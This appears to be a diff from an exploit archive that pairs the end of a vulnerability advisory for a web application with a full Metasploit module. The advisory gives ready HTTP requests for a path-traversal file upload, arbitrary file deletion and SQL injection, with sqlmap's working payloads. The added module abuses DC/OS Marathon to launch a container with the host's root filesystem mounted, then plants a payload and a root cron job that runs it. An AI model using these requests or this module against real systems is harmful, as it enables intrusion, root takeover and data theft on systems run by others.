 POST
 /robert/fct/uploader.php?dataType=tekos&folder=../../config&qqfile=filename.jpg
 HTTP/1.1
 Host: 192.168.3.215
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
 Firefox/53.0
 Accept: */*
 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
 X-Requested-With: XMLHttpRequest
 X-File-Name: filename.jpg
 Content-Type: application/octet-stream
 Referer: http://192.168.3.215/robert/index.php?go=gens
 Content-Length: 99550
 Cookie: YOURCOOKIE
 Connection: close
 ...snip...
 file data
 ...snip...
 param vuln : folder
 script vuln : uploader.php
 11- Directory traversal on Delete fonction (Delete Arbitrary File)
 POST /robert/fct/plans_actions.php HTTP/1.1
 Host: 192.168.3.215
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
 Firefox/53.0
 Accept: */*
 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
 Content-Type: application/x-www-form-urlencoded
 X-Requested-With: XMLHttpRequest
 Referer: http://192.168.3.215/robert/index.php?go=calendrier
 Content-Length: 42
 Cookie:YOURCOOKIE
 Connection: close
 action=supprFichier&idPlan=4&file=../../../../tested.txt
 param vuln : file
 script vuln : plans_actions.php
 11- SQL Injection
 POST /robert/fct/plans_actions.php HTTP/1.1
 Host: 192.168.3.215
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
 Firefox/53.0
 Accept: */*
 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
 Content-Type: application/x-www-form-urlencoded
 X-Requested-With: XMLHttpRequest
 Referer: http://192.168.3.215/robert/index.php?go=calendrier
 Content-Length: 20
 Cookie: YOURCOOKIE
 Connection: close
 action=loadPlan&ID=2'
 POST parameter 'ID' is vulnerable. Do you want to keep testing the others
 (if any)? [y/N]
 sqlmap identified the following injection point(s) with a total of 397
 HTTP(s) requests:
 ---
 Parameter: ID (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
 (NOT)
    Payload: action=loadPlan&ID=2' OR NOT 8111=8111#
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
 BY clause (FLOOR)
    Payload: action=loadPlan&ID=2' AND (SELECT 3865 FROM(SELECT
 COUNT(*),CONCAT(0x7171787171,(SELECT
 (ELT(3865=3865,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM
 INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XhTe
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: action=loadPlan&ID=2';SELECT SLEEP(5)#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: action=loadPlan&ID=2' OR SLEEP(5)-- zwwN
 ---
 param vuln : ID
 script vuln : plans_actions.php
 ------------------------------------------------------------------------------------------------------------------------------
 #### Special Thanks to SC, PC and Mana l'artiste from HTTPCS - Ziwit
 SecTeam ####
 ------------------------------------------------------------------------------------------------------------------------------
--- a/platforms/python/remote/42134.rb
+++ b/platforms/python/remote/42134.rb
@ -0,0 +1,195 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DC/OS Marathon UI Docker Exploit',
      'Description'    => %q{
        Utilizing the DCOS Cluster's Marathon UI, an attacker can create
        a docker container with the '/' path mounted with read/write
        permissions on the host server that is running the docker container.
        As the docker container executes command as uid 0 it is honored
        by the host operating system allowing the attacker to edit/create
        files owed by root. This exploit abuses this to creates a cron job
        in the '/etc/cron.d/' path of the host server.
        *Notes: The docker image must be a valid docker image from
        hub.docker.com. Further more the docker container will only
        deploy if there are resources available in the DC/OS cluster.
      },
      'Author'         => 'Erik Daguerre',
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
      ],
      'Targets'            => [
        [ 'Python', {
            'Platform'   => 'python',
            'Arch'       => ARCH_PYTHON,
            'Payload'    => {
              'Compat'   => {
                'ConnectionType' => 'reverse noconn none tunnel'
              }
            }
          }
        ]
      ],
      'DefaultOptions' => { 'WfsDelay' => 75 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 03, 2017'))
    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
        OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
        OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
      ])
  end
  def get_apps
    res = send_request_raw({
      'method'  => 'GET',
      'uri'     => target_uri.path
    })
    return unless res and res.code == 200
    # verify it is marathon ui, and is returning content-type json
    return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json'
    apps = JSON.parse(res.body)
    apps
  end
  def del_container(container_id)
    res = send_request_raw({
      'method'  => 'DELETE',
      'uri'     => normalize_uri(target_uri.path, container_id)
    })
    return unless res and res.code == 200
    res.code
  end
  def make_container_id
    return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
    rand_text_alpha_lower(8)
  end
  def make_cmd(mnt_path, cron_path, payload_path)
    vprint_status('Creating the docker container command')
    payload_data = nil
    echo_cron_path = mnt_path + cron_path
    echo_payload_path = mnt_path + payload_path
    cron_command = "python #{payload_path}"
    payload_data = payload.raw
    command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n"
    command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n"
    command << "echo \"\" >> #{echo_cron_path}\n"
    command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n"
    command << "sleep 120"
    command
  end
  def make_container(mnt_path, cron_path, payload_path, container_id)
    vprint_status('Setting container json request variables')
    container_data = {
      'cmd'                 => make_cmd(mnt_path, cron_path, payload_path),
      'cpus'                => 1,
      'mem'                 => 128,
      'disk'                => 0,
      'instances'           => 1,
      'id'                  => container_id,
      'container'           => {
        'docker'            => {
          'image'           => datastore['DOCKERIMAGE'],
          'network'         => 'HOST',
        },
        'type'              => 'DOCKER',
        'volumes'           => [
          {
            'hostPath'      => '/',
            'containerPath' => mnt_path,
            'mode'          => 'RW'
          }
        ],
      },
      'env'                 => {},
      'labels'              => {}
    }
    container_data
  end
  def check
    return Exploit::CheckCode::Safe if get_apps.nil?
    Exploit::CheckCode::Appears
  end
  def exploit
    if get_apps.nil?
      fail_with(Failure::Unknown, 'Failed to connect to the targeturi')
    end
    # create required information to create json container information.
    cron_path = '/etc/cron.d/' + rand_text_alpha(8)
    payload_path = '/tmp/' + rand_text_alpha(8)
    mnt_path = '/mnt/' + rand_text_alpha(8)
    container_id = make_container_id()
    res = send_request_raw({
      'method'  => 'POST',
      'uri'     => target_uri.path,
      'data'    => make_container(mnt_path, cron_path, payload_path, container_id).to_json
    })
    fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201
    print_status('The docker container is created, waiting for it to deploy')
    register_files_for_cleanup(cron_path, payload_path)
    sleep_time = 5
    wait_time = datastore['WAIT_TIMEOUT']
    deleted_container = false
    print_status("Waiting up to #{wait_time} seconds for docker container to start")
    while wait_time > 0
      sleep(sleep_time)
      wait_time -= sleep_time
      apps_status = get_apps
      fail_with(Failure::Unknown, 'No apps returned') unless apps_status
      apps_status['apps'].each do |app|
        next if app['id'] != "/#{container_id}"
        if app['tasksRunning'] == 1
          print_status('The docker container is running, removing it')
          del_container(container_id)
          deleted_container = true
          wait_time = 0
        else
          vprint_status('The docker container is not yet running')
        end
        break
      end
    end
    # If the docker container does not deploy remove it and fail out.
    unless deleted_container
      del_container(container_id)
      fail_with(Failure::Unknown, "The docker container failed to start")
    end
    print_status('Waiting for the cron job to run, can take up to 60 seconds')
  end
 end